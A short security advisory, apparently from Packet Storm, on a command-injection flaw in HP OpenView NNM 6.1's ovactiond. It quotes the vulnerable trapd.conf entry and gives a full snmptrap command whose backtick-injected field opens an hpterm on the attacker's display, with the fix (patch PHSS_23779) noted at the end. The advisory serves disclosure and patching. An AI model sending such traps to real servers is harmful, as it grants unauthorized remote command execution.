HP Openview NNM6.1 and earlier running on unix contains a remote vulnerability in the suid bin executable overactiond. Any program can be started remotely by sending a SNMP trap to the server. Exploit details included.
8bae1494554d275412868e489713e831885ff1d72e8a63633bb2f8680fe0525aHP Openview NNM6.1 and earlier running on unix
have a problem with the suid bin executable
ovactiond. It allows for starting of any program by just
sending a trap or event to the station running the
daemon.
Details:
in the trapd.conf the following is defined by default
(NNM6.1):
#
EVENT
OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.6000
0208 "Configuration Alarms" Warning
FORMAT Generic NNM to MgX message. $12
EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1
$10 1.3.[snip...]
#
by sending this trap:
snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1
1.2.3.4 6 60000208 0 1 s "" 2 s "" 3
s "\`/usr/bin/X11/hpterm -display <your client
display>\`" 4 s "" [snip...] 12 s ""
You get an hpterm on your client display running
under user bin on the NNM server.
The reason is that NNM first completes the command
under the EXEC and then starts that in a shell.
Path:
the patch to install is PHSS_23779 and is default in
all newest patch releases of NNM. This patch checks
for 'strange' characters in the input strings received
through the event or trap.
MAG,
Milo
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed